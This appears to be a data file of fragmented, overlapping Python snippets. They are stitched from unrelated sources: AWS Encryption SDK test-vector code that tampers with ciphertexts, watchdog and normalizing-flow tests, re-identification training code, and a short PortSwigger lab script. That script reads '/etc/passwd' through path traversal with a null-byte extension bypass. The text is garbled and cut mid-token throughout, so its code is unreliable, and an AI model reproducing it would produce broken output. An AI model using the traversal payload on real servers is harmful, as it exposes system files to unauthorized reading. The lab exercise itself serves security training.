Mapping of plaintext", "pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager)", ") for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod", "from copy import copy import attr import six from aws_encryption_sdk.caches.local", "production! It is imitating what a malicious decryptor without encryption", "ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at", "specification. :param dict scenario: Scenario specification JSON :param KeysManifest keys:", "self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with tampering for", "Algorithm as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: #", "that generates materials for an unsigned algorithm suite that includes", ":type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs: Iterable of master", "MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS )", ").items() } decrypt_manifest = MessageDecryptionManifest( keys_uri=\"file://keys.json\", keys=self.keys, test_scenarios=test_scenarios ) root_writer(\"manifest.json\",", "every byte (except zero).\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "plaintext values. :param dict plaintexts_specs: Mapping of plaintext name to", "bytes(result) class MutateTamperingMethod(TamperingMethod): \"\"\"Tampering method that produces a message with", "def __init__(self, materials_manager, new_provider_info): \"\"\"Create a new CMM that wraps", "# or in the \"license\" file accompanying this file. This", "MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider info: \" + new_provider_info", "Optional method used to tamper with the ciphertext :type tampering_method:", ":param str target_directory: Directory in which to write all output", "ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that modifies", "import attr import six from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache from aws_encryption_sdk.materials_managers.base", "plaintext_uri)) def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name,", "ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt,", "Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version =", "to size in bytes :return: Mapping of plaintext name to", ") except ImportError: # pragma: no cover # We only", "tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if", "and limitations under the License. \"\"\" AWS Encryption SDK Decrypt", "on all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos):", "pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length],", "the requested named ciphertext and return a URI locating the", "be used in production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info =", "^= 1 << (BITS_PER_BYTE - bit_index - 1) return bytes(result)", "\"\"\"Process all known encrypt test scenarios and write the resulting", "from_scenario(cls, scenario, keys, plaintexts): \"\"\"Load from a scenario specification. :param", "key provider info: \" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer,", "import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1 have", "(ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt", "for file containing JSON manifest :return: Loaded manifest :rtype: MessageEncryptionManifest", "OF # ANY KIND, either express or implied. See the", "awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and 3.5.1", "EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info", "def run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the resulting", "spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering", "ESDKs to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider):", "based on the given master key provider. \"\"\" self.wrapped_default_cmm =", "info on all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "CMM\"\"\" return self.wrapped_default_cmm.decrypt_materials(request) @attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data", "raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts ) except", "used in production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types))", "or the result. return: a list of (ciphertext, result) pairs", "signed message, and therefore this is an important case for", "3.5.0 and 3.5.1 have incompatible typing modules from typing import", "int json_indent: Number of spaces to indent JSON files (optional:", "\"\"\"Tampering method that truncates a good message at every byte", "<< (BITS_PER_BYTE - bit_index - 1) return bytes(result) class MutateTamperingMethod(TamperingMethod):", "json_indent: Number of spaces to indent JSON files (optional: default", "and then changing the algorithm suite and removing the signing", "TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else", "that changes the provider info on all EDKs.\"\"\" new_provider_infos =", "DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result =", "disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma: no cover", "pairs. \"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt,", "# may not use this file except in compliance with", "def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs) else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn", "run(self, ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the resulting ciphertext", "plaintext values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec", "You # may not use this file except in compliance", "to write minified) \"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir)", "MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls,", "decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result = MessageDecryptionTestResult.from_result_spec(result_spec, None)", "affiliates. All Rights Reserved. # # Licensed under the Apache", "list of (ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn()", "the mypy checks pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base", "avoid generating a new data key every time. cache =", "the Apache License, Version 2.0 (the \"License\"). You # may", "= generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect encrypted data key provider", "all EDKs.\"\"\" new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types)) def __init__(self, new_provider_infos): \"\"\"Create", "ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: # pragma: no cover #" ]
[ "import WatchdogAcceptanceTest class TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self):", "class TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop()", "self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running) def test_willJoinObserverThreadWhenWatchdogStopped(self): self.create_and_start_watchdog()", "self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running) def test_willJoinObserverThreadWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop()", "from acceptance.harness.acceptance_test import WatchdogAcceptanceTest class TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running)", "acceptance.harness.acceptance_test import WatchdogAcceptanceTest class TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def", "def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running) def", "def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running) def test_willJoinObserverThreadWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertTrue(self.fs_observer.joined)", "test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running) def test_willJoinObserverThreadWhenWatchdogStopped(self):", "WatchdogAcceptanceTest class TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog()", "TestStartStopFeature(WatchdogAcceptanceTest): def test_willStartObserverWhenWatchdogStarted(self): self.create_and_start_watchdog() self.assertTrue(self.fs_observer.running) def test_willStopObserverWhenWatchdogStopped(self): self.create_and_start_watchdog() self.watchdog.stop() self.assertFalse(self.fs_observer.running)" ]
[ "inverse = base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform]) outputs, logabsdet =", "outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs)", "identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def", "inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second, msg=None): if ((self._eps", "((self._eps and (first - second).abs().max().item() < self._eps) or (not self._eps", "shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is not None:", "inputs): inverse = base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform]) outputs, logabsdet", "from neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all", "self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self,", "second, msg=None): if ((self._eps and (first - second).abs().max().item() < self._eps)", "torchtestcase from neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for", "shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first,", "assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is", "transform]) outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs,", "import torch import torchtestcase from neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase):", "def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape", "None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs): inverse = base.InverseTransform(transform)", "msg=None): if ((self._eps and (first - second).abs().max().item() < self._eps) or", "self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs): inverse = base.InverseTransform(transform) identity", "neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all transforms.\"\"\"", "if shape is not None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform,", "torch import torchtestcase from neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base", "self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is not None: self.assertEqual(tensor.shape,", "transform, inputs): inverse = base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform]) outputs,", "base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform]) outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs,", "import torchtestcase from neural_spline_flows.nde.transforms import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test", "def assertNotEqual(self, first, second, msg=None): if ((self._eps and (first -", "is not None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs): inverse", "TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None):", "base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all transforms.\"\"\" def assert_tensor_is_good(self,", "self.assertFalse(torch.isinf(tensor).any()) if shape is not None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self,", "torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second, msg=None): if ((self._eps and (first", "first, second, msg=None): if ((self._eps and (first - second).abs().max().item() <", "and (first - second).abs().max().item() < self._eps) or (not self._eps and", "logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet,", "\"\"\"Base test for all transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor,", "torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs): inverse = base.InverseTransform(transform) identity =", "if ((self._eps and (first - second).abs().max().item() < self._eps) or (not", "assertNotEqual(self, first, second, msg=None): if ((self._eps and (first - second).abs().max().item()", "tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is not", "base.CompositeTransform([inverse, transform]) outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])", "second).abs().max().item() < self._eps) or (not self._eps and torch.equal(first, second))): self._fail_with_message(msg,", "self._eps and torch.equal(first, second))): self._fail_with_message(msg, \"The tensors are _not_ different!\")", "or (not self._eps and torch.equal(first, second))): self._fail_with_message(msg, \"The tensors are", "< self._eps) or (not self._eps and torch.equal(first, second))): self._fail_with_message(msg, \"The", "self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second,", "torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is not None: self.assertEqual(tensor.shape, torch.Size(shape))", "assert_forward_inverse_are_consistent(self, transform, inputs): inverse = base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform])", "= identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))", "= base.InverseTransform(transform) identity = base.CompositeTransform([inverse, transform]) outputs, logabsdet = identity(inputs)", "identity = base.CompositeTransform([inverse, transform]) outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape)", "class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all transforms.\"\"\" def assert_tensor_is_good(self, tensor,", "shape is not None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs):", "for all transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any())", "self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if shape is not None: self.assertEqual(tensor.shape, torch.Size(shape)) def", "self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second, msg=None): if", "all transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any())", "test for all transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor)", "- second).abs().max().item() < self._eps) or (not self._eps and torch.equal(first, second))):", "transforms.\"\"\" def assert_tensor_is_good(self, tensor, shape=None): self.assertIsInstance(tensor, torch.Tensor) self.assertFalse(torch.isnan(tensor).any()) self.assertFalse(torch.isinf(tensor).any()) if", "= base.CompositeTransform([inverse, transform]) outputs, logabsdet = identity(inputs) self.assert_tensor_is_good(outputs, shape=inputs.shape) self.assert_tensor_is_good(logabsdet,", "self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second, msg=None): if ((self._eps and", "def assert_forward_inverse_are_consistent(self, transform, inputs): inverse = base.InverseTransform(transform) identity = base.CompositeTransform([inverse,", "(first - second).abs().max().item() < self._eps) or (not self._eps and torch.equal(first,", "self._eps) or (not self._eps and torch.equal(first, second))): self._fail_with_message(msg, \"The tensors", "import base class TransformTest(torchtestcase.TorchTestCase): \"\"\"Base test for all transforms.\"\"\" def", "shape=inputs.shape[:1]) self.assertEqual(outputs, inputs) self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1])) def assertNotEqual(self, first, second, msg=None):", "(not self._eps and torch.equal(first, second))): self._fail_with_message(msg, \"The tensors are _not_", "not None: self.assertEqual(tensor.shape, torch.Size(shape)) def assert_forward_inverse_are_consistent(self, transform, inputs): inverse =" ]
[ "sys import requests site = sys.argv[1] if 'https://' in site:", "\"\"\" https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass \"\"\" import sys import requests site = sys.argv[1]", "if 'https://' in site: site = site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''", "https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass \"\"\" import sys import requests site = sys.argv[1] if", "sys.argv[1] if 'https://' in site: site = site.rstrip('/').lstrip('https://') url =", "<filename>directory-traversal/validate-file-extension-null-byte-bypass.py \"\"\" https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass \"\"\" import sys import requests site =", "site = site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s = requests.Session() resp", "site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s = requests.Session() resp = s.get(url)", "site = sys.argv[1] if 'https://' in site: site = site.rstrip('/').lstrip('https://')", "= site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s = requests.Session() resp =", "import sys import requests site = sys.argv[1] if 'https://' in", "\"\"\" import sys import requests site = sys.argv[1] if 'https://'", "'https://' in site: site = site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s", "requests site = sys.argv[1] if 'https://' in site: site =", "site: site = site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s = requests.Session()", "in site: site = site.rstrip('/').lstrip('https://') url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s =", "= sys.argv[1] if 'https://' in site: site = site.rstrip('/').lstrip('https://') url", "import requests site = sys.argv[1] if 'https://' in site: site", "url = f'''https://{site}/image?filename=../../../etc/passwd%00.png''' s = requests.Session() resp = s.get(url) print(resp.text)" ]
[ "logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled =", "# @Software: PyCharm # @Desc : from my_reid.eug import *", "u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step in range(total_step): #", "t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2:", "ckpt_file = -1, '' if args.resume: resume_step, ckpt_file = resume(save_path)", "import Path def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step", "@File : atmpro1_vsm2.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6", "init=args.init) resume_step, ckpt_file = -1, '' if args.resume: resume_step, ckpt_file", "{:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre))", "max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data = u_data", "20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. #", "need resume if start_step >= 0: print(\"continued from iter step\",", "the labeled and unlabeled data for training dataset_all = datasets.create(args.dataset,", "#!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time : 2020/9/3", "# @File : atmpro1_vsm.py # @Software: PyCharm # @Desc :", "Joselynzhao # @Email : <EMAIL> # @File : atmpro1.py #", "from my_reid.utils.logging import Logger import os.path as osp import sys", "#mode = 1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t =", "config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 + 'config_info' +", "re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\" # find start", "mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx =", "<EMAIL> # @File : atmpro1_vsm2.py # @Software: PyCharm # @Desc", "# 只对eug进行性能评估 # mAP, rank1, rank5, rank10, rank20 = 0,", "raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select,", "default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5)", "print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _,", "my_reid import datasets from my_reid import models import numpy as", "= Path('/mnt/') if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') #", "import Logger import os.path as osp import sys from torch.backends", "from pathlib import Path def resume(savepath): import re pattern =", "my_reid import models import numpy as np import torch import", "open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'),", "time.time() step_time = end_time - start_time total_time = step_time +", "l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size,", "# 本地跑用这个 cudnn.benchmark = True cudnn.enabled = True save_path =", "100 // args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log' +", "ratio, save_path)) # train the model or load ckpt start_time", ": Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm2.py", "# raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time()", "'--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率,", "# @Author : Joselynzhao # @Email : <EMAIL> # @File", "= True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name,", "1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") +", "'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为", "-*- # @Time : 2020/9/1 下午7:07 # @Author : Joselynzhao", "raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _,", "files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step:", "<EMAIL> # @File : atmpro1.py # @Software: PyCharm # @Desc", "{:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre,", "cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) #", "2020/9/1 下午7:07 # @Author : Joselynzhao # @Email : <EMAIL>", "rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score,", "= eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step)", "nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else: #mode =", ">= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2))", "= open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one", "ckpt_file = \"\" # find start step files = os.listdir(savepath)", "coding: utf-8 -*- # @Time : 2020/9/3 上午11:03 # @Author", "rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if", "re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16)", "= open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a')", "@Desc : from my_reid.eug import * from my_reid import datasets", "osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20)", "import numpy as np import torch import argparse import os", "True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order)", "raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0", "@File : atmpro1.py # @Software: PyCharm # @Desc : from", "step files = os.listdir(savepath) files.sort() for filename in files: try:", "warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import os.path as osp", "> start_step: start_step = iter_ ckpt_file = osp.join(savepath, filename) except:", "0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step", "label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is", "0 mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) #", "{:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__': parser", "{:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} 